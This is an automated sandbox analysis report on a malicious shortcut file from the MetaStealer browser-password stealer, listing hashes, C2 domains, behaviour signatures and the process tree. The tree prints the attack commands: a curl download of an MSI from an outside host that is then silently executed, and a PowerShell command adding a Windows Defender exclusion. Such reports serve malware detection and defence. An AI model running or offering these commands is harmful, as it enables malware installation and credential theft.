
Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12/12/2024, 11:08

General

  • Target

    Document.lnk.download.lnk

  • Size

    2KB

  • MD5

    d4f518a06f228fb45e26355095985eee

  • SHA1

    1fcdd6f0a1e7513c607bbbe40ce50567225e81e8

  • SHA256

    d9e9cf4e194792c8a81fa855733259a633e830d7753839c0b1be1314e3d478f3

  • SHA512

    0e4d4d728b29463efe163a1654a8f67c6fe363505d3d41ddd7c2bb2210f36e5eb2bfb3017394a14407c69e0f04fc8913650d56ae4b460f60a366379f6d2596d9

Malware Config

Extracted

Family

metastealer

C2

kiyaqoimsiieeyqa.xyz

ssqsmisuowqcwsqo.xyz

ykqmwgsuummieaug.xyz

ewukeskgqswqesiw.xyz

cscqcsgewmwwaaui.xyz

cyoksykiamiscyia.xyz

okgomokemoucqeso.xyz

ikwacuakiqeimwua.xyz

aawcsqqaywckiwmi.xyz

aiqasksgmyeqocei.xyz

qgumcuisgaeyuqqe.xyz

eiesoycamyqqgcea.xyz

ywceswakicsqomqw.xyz

auaieuewouawygku.xyz

cmiascusccywowcs.xyz

uiqkkomkaceqacec.xyz

quqeciymqmkqccqw.xyz

ssqsauuuyyigouou.xyz

aogaakukuugqswcy.xyz

ucgwcwsuqsuwewgc.xyz

Attributes
  • dga_seed

    21845

  • domain_length

    16

  • num_dga_domains

    10000

  • port

    443

Signatures

  • Meta Stealer

    Meta Stealer, written in C++, steals passwords stored in browsers.

  • MetaStealer payload 1 IoCs
  • Metastealer family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Document.lnk.download.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k curl -sLo C:\Users\Admin\AppData\Local\Temp\a1bc08e6-90e6-4852-ab11-16ba60e33abb.msi https://servergate.org/rt/setup.msi & C:\Users\Admin\AppData\Local\Temp\a1bc08e6-90e6-4852-ab11-16ba60e33abb.msi /qn & exit
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1560
      • C:\Windows\System32\curl.exe
        curl -sLo C:\Users\Admin\AppData\Local\Temp\a1bc08e6-90e6-4852-ab11-16ba60e33abb.msi https://servergate.org/rt/setup.msi
        3⤵
        PID:2628
      • C:\Windows\System32\msiexec.exe
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\a1bc08e6-90e6-4852-ab11-16ba60e33abb.msi" /qn
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3184
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3776
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 04BA198EA1F583006FF04F71BB151FE9
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-541f47cc-4730-40a7-b0b5-90f1f8912372\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        PID:2940
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:3584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2296
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcca9146f8,0x7ffcca914708,0x7ffcca914718
            5⤵
            PID:4012
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
            5⤵
            PID:208
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4424
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8
            5⤵
            PID:540
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
            5⤵
            PID:2540
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
            5⤵
            PID:3032
          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
            5⤵
            PID:2356
          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:868
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
            5⤵
            PID:3804
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
            5⤵
            PID:3108
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
            5⤵
            PID:1244
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
            5⤵
            PID:2356
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1819044807180378578,11011922226386028529,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1800 /prefetch:2
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:5644
      • C:\Users\Admin\AppData\Local\Temp\MW-541f47cc-4730-40a7-b0b5-90f1f8912372\files\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-541f47cc-4730-40a7-b0b5-90f1f8912372\files\setup.exe" /VERYSILENT /VERYSILENT
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3236
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\systemtask.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5972
        • C:\Windows\SysWOW64\systeminfo.exe
          systeminfo
          4⤵
          • System Location Discovery: System Language Discovery
          • Gathers system information
          PID:1404
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:1460
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2368

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize: 152B
    MD5: d22073dea53e79d9b824f27ac5e9813e
    SHA1: 6d8a7281241248431a1571e6ddc55798b01fa961
    SHA256: 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
    SHA512: 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize: 152B
    MD5: bffcefacce25cd03f3d5c9446ddb903d
    SHA1: 8923f84aa86db316d2f5c122fe3874bbe26f3bab
    SHA256: 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
    SHA512: 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
    Filesize: 383B
    MD5: feadb73d4360553aabef56d95749f543
    SHA1: 83a365b56e4c58cd44aeca1d607c2f7315655710
    SHA256: 3b3fd54fa2113adbb1e674e5c4a370932eeb9e5e017b322898dc3d4d1d333f5c
    SHA512: 0696c6ec91fee081c78fd32c41c0209305b307a6ba3b862e118a2fe5c7eb8985e69d79264e129be994784ae27142a6f7016d60fae4e9104fd03ddec383daa185

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize: 5KB
    MD5: 3384d83c51df4dd429ca7a83e4740fe1
    SHA1: a0b670e1e6b7f7c3ca674a5c041c0f0a6411d042
    SHA256: 2106aab1dac60a7e8550abf9beaf922b6bfe93598a8432fc5e306e5539f6726e
    SHA512: 6f03cdd51becf3eace3cbdf749cd9bbe229009f1b1e5101754151edeebcc80021f4ad9e01d71b58e9ba2484eb8f5a0ff665431c5bad8f5bfc0375119a848cf4a

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize: 6KB
    MD5: 7985759f55a09cf8f99d694becaf77f3
    SHA1: 56fae5433763b6e82880e938e1cdb76e255a6059
    SHA256: 0b9c330abd754087a86fd12f72c313b438ebf23184814a7136d25974df6e23f6
    SHA512: 64a42e7403a905597011d0900d9745d278d24e544d969e733fadca9a7f0e0cfb44327690017fefd0882ce9b37d371ba4e0e5939f326270561af7a02b8567ef5a

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
    Filesize: 16B
    MD5: 6752a1d65b201c13b62ea44016eb221f
    SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
    SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
    SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    Filesize: 10KB
    MD5: f3869f0226e5a798a0c18a16be324cdd
    SHA1: 29bd00d1b95446517c9071b63897eb895241395b
    SHA256: ebc277866de2b476626b182329de2b0624eb521138fd1a8e0f17d4b57fa6a2a1
    SHA512: cd5de8cef5b9fff07b92a8660b97f294384afc5178fd4a8e0800bdfa77e21cf297cf9f7960ba40331b457899f9eca8ac3a28620feb00ef15bd70813ce3480959

  • C:\Users\Admin\AppData\Local\Temp\MW-541f47cc-4730-40a7-b0b5-90f1f8912372\files.cab
    Filesize: 1.5MB
    MD5: 6ea1c4d2c75ee362820e814110f3dc90
    SHA1: 6f73fda661df49c64f6d8d2b66bef5a2f1939775
    SHA256: 8d1a7eafd0eb76d2aa0b522c6a98240489692fd1ca82565ad85d65be64b05d94
    SHA512: 5335ac317d7aeb93f509f073442e65a5be2bf0aed5fd88839d69a6b72360560ed227975fac062ab8d2476074417288dfd53eddfb3b12667ae0a8677e73f7a495

  • C:\Users\Admin\AppData\Local\Temp\MW-541f47cc-4730-40a7-b0b5-90f1f8912372\msiwrapper.ini
    Filesize: 1KB
    MD5: 8ea7db4828ed349f142955c177414cb8
    SHA1: 1d6820badc77546552425528e62e5690d19c46a7
    SHA256: 1d64741498200dc66c8d4349c0f1c55ecd452f5c24104787811fb8983f0b0c25
    SHA512: 64f46fbc7844d12983aa2d9d8aa93973f56e9c4d38d5d2bbe7e328b1c08037fbfa748a0ff7b279c4fc10e151b8853087a04442a5285b5bf6978860c47beffd0e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_glxmvosz.rxu.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\a1bc08e6-90e6-4852-ab11-16ba60e33abb.msi
    Filesize: 1.8MB
    MD5: a08ac9d031b2c05b4ad646e76867f2c2
    SHA1: 49e8cd403932e528db6ab8fea229dac7dc2064af
    SHA256: 2a6978db146ea87b8da5cb48b821c8219ac05d6d3f33cbff8571f5ff4141d198
    SHA512: 3acdb495d5ecf2579d54e7fe30d4e3686f3aab65b6fbf3b39c9e73bead09bd9de422dc91baba45f235baef6c326b5d1c8a58d1e68b2c9ba62a1497f3378ee922

  • C:\Windows\Installer\MSIB342.tmp
    Filesize: 208KB
    MD5: 0c8921bbcc37c6efd34faf44cf3b0cb5
    SHA1: dcfa71246157edcd09eecaf9d4c5e360b24b3e49
    SHA256: fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1
    SHA512: ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

  • memory/3236-155-0x0000000010000000-0x0000000010731000-memory.dmp
    Filesize: 7.2MB

  • memory/5972-165-0x00000000061D0000-0x0000000006236000-memory.dmp
    Filesize: 408KB

  • memory/5972-191-0x0000000008190000-0x000000000880A000-memory.dmp
    Filesize: 6.5MB

  • memory/5972-162-0x00000000058B0000-0x00000000058D2000-memory.dmp
    Filesize: 136KB

  • memory/5972-161-0x0000000005A00000-0x0000000006028000-memory.dmp
    Filesize: 6.2MB

  • memory/5972-175-0x0000000006240000-0x0000000006594000-memory.dmp
    Filesize: 3.3MB

  • memory/5972-176-0x0000000006820000-0x000000000683E000-memory.dmp
    Filesize: 120KB

  • memory/5972-177-0x0000000006860000-0x00000000068AC000-memory.dmp
    Filesize: 304KB

  • memory/5972-179-0x000000006EE10000-0x000000006EE5C000-memory.dmp
    Filesize: 304KB

  • memory/5972-178-0x00000000077F0000-0x0000000007822000-memory.dmp
    Filesize: 200KB

  • memory/5972-189-0x0000000006E10000-0x0000000006E2E000-memory.dmp
    Filesize: 120KB

  • memory/5972-190-0x0000000007830000-0x00000000078D3000-memory.dmp
    Filesize: 652KB

  • memory/5972-164-0x0000000006160000-0x00000000061C6000-memory.dmp
    Filesize: 408KB

  • memory/5972-192-0x0000000007B50000-0x0000000007B6A000-memory.dmp
    Filesize: 104KB

  • memory/5972-193-0x0000000007BB0000-0x0000000007BBA000-memory.dmp
    Filesize: 40KB

  • memory/5972-194-0x0000000007DE0000-0x0000000007E76000-memory.dmp
    Filesize: 600KB

  • memory/5972-195-0x0000000007D50000-0x0000000007D61000-memory.dmp
    Filesize: 68KB

  • memory/5972-196-0x0000000007D80000-0x0000000007D8E000-memory.dmp
    Filesize: 56KB

  • memory/5972-197-0x0000000007D90000-0x0000000007DA4000-memory.dmp
    Filesize: 80KB

  • memory/5972-198-0x0000000007EA0000-0x0000000007EBA000-memory.dmp
    Filesize: 104KB

  • memory/5972-199-0x0000000007DD0000-0x0000000007DD8000-memory.dmp
    Filesize: 32KB

  • memory/5972-160-0x0000000002F00000-0x0000000002F36000-memory.dmp
    Filesize: 216KB